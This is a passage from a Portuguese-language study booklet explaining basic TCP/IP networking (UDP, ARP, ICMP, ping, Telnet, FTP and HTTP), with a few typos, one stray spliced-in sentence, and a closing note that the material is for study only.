PERFORMANCE, A MIORIA DOS SERVIDORES ENVIAM UM
ACK PARA TODOS (AO INVÉS DE TODO O PACOTE) OU
QUANDO UM ACK EXPIRA.
UDP: SE A CONFIABILIDADE NÃO É ESSENCIAL, O UDP
(USER DATAGRAM PROTOCOL), UM COMPLEMENTO DO
TCP, OFERECE UM SERVIÇO DE TRANSMISSÃO DE DADOS
SEM CONEXÃO QUE NÃO GARANTE NEM A ENTREGA NEM
A CORRETA SEQUENCIA DOS PACOTES ENVIADOS (BEM O final da apostila chegou, espero que tirem bom aproveito dela.
PARECIDO COM O IP). CHECKSUNS NO UDP SÃO
OPCIONAIS OFERECENDO ASSIM UMA MANEIRA DE SE
TROCAR DADOS EM UMA REDE ALTAMENTE CONFIÁVEL
SEM CONSUMIR DESNECESSARIAMENTE RECURSOS DA
REDE.

ARP E ICMP: DOIS OUTROS PROTOCOLOS DA FAMÍLIA

TCP/IP TEM IMPORTANTES FUNÇÕES, EMBORA ESSAS
FUNÇÕES NÃO ESTEJAM DIRETAMENTE RELACIONADAS
COM A TRANSMISSÃO DE DADOS: (ARP= ADDRESS
RESOLUTION PROTOCOL, OU PROTOCOLO DE
RESOLUÇÃO DE ENDEREÇOS) E ICMP (INTERNET
CONTROL MESSAGE PROTOCOL, OU PROTOCOLO DE
RESOLUÇÃO DE ENDEREÇOS NA INTERNET). O ARP E O
ICMP SÃO PROTOCOLOS DE MANUTENÇÃO QUE MANTÉM
A ESTRUTURA DO IP E USUALMENTE SÃO INVISÍVEIS AOS
USUÁRIOS E AS APLICAÇÕES.

OS CABEÇALHOS DO IP CONTÉM TANTO O ENDEREÇO IP

DA ORIGEM QUANTO DO DESTINO, MAS O ENDEREÇO DO
HADWARE TAMBÉM TEM DE SER CONHECIDO. O IP OBTÉM
UM ENDEREÇO DE HARDWARE DE UM DETERMINADO
SISTEMA DIFUNDINDO PELA REDE UM PACOTE ESPECIAL
DE REQUISIÇÃO (UM PACOTE ARP DE REQUISIÇÃO)
CONTENDO O ENDEREÇO IP DO SISTEMA COM O QUAL
ESTÁ TENTANDO SE COMUNICAR. TODOS NÓS DA REDE
LOCAL QUE TIVEREM O ARP HABILITADO DETECTAM ESSA
DIFUSÃO, E O SISTEMA QUE TEM O NÚMERO DE IP EM
QUESTÃO ENVIA UM PACOTE ARP CONTENDO O
ENDEREÇO DE HARDWARE PARA O COMPUTADOR QUE
SOLICITOU. O ENDEREÇO DE HARWARE E O ENDEREÇO
DO IP ESTÃO ARMAZENADO NO CACHE DO ARP PARA USO
FUTURO. COMO A RESPOSTA ARP TAMBÉM É FEITA NA
FORMA DE DIFUSÃO, É NORMAL QUE OUTROS NÓS USEM
INFORMAÇÃO PARA ATUALIZAR SEUS CACHES ARP.

O ICMP PERMITE QUE 2 NÓS EM UMA REDE IP

COMPARTILHEM O STATUS DO IP E INFORMAÇÕE DE
ERRO. ESSA INFORMAÇÃO PODE SER USADA POR
PROTOCOLOS DE ALTO NÍVEL PARA TRATAR PROBLEMAS
DE TRANSMISSÃO OU PARA ADMINISTRADORES DE REDE
PARA DETECTAR PROBLEMAS NA REDE. EMBORA
ESTEJAM ENCAPSULADOS EM PACOTES IP, O ICMP NÃO É
CONSIDERADO UM PROTOCOLO DE ALTO NÍVEL (ELE É
NECESSÁRIO EM TODA IMPLEMENTAÇÃO DO TCP/IP. O
UTILITÁRIO PING FAZ USO DO ICMP PARA VERIFICAR SE
UM CERTO ENDEREÇO NA REDE ESTÁ OPERACIONAL.
ISTO É UTIL PARA DETECTAR PROBLEMAS EM REDES IP
UO FALHAS EM GATEWAYS.

OUTROS PROTOCOLOS
ALÉM DESSES PROTOCOLOS CITADOS, EXISTEM OS
PROTOCOLOS DE ALTO NÍVEL, COMO O TELNET, FTP, HTTP
E ETC. VAMOS DAR UMA BREVE DESCRIÇÃO DELES:

TELNET: É UM PROTOCOLO QUE PERMITE O LOGON EM

MÁQUINA REMOTAS. VOCÊ PASSA A UTILIZAR A MÁQUINA
REMOTA PARA REALIZAR O PROCESSAMENTO. NO
WINDOWS NT EXISTE O RAS (REMOTE ACCESS SERVICE,
SERVIÇO DE ACESSO REMOTO) QUE TEM OS MESMOS
OBJETIVOS DO TELNET.

FTP: É UM PROTOCOLO UTILIZADO PARA FAZER

TRANSFERÊNCIA DE ARQUIVOS.

HTTP: É O PROTOCOLO UTILIZADO NA WEB, ELE

TRANSMITE TEXTOS, GRÁFICOS E QUALQUER OUTRO TIPO
DE ARQUIVO (SUBSTITUINDO O FTP), ALÉM DE PERMITIR A
NAVEGAÇÃO ATRAVÉS DE HIPER TEXTO.

Leia com Atenção

Lembrando que o conteúdo desta apostila é apenas pra estudo e
conhecimento dos usuarios de internet.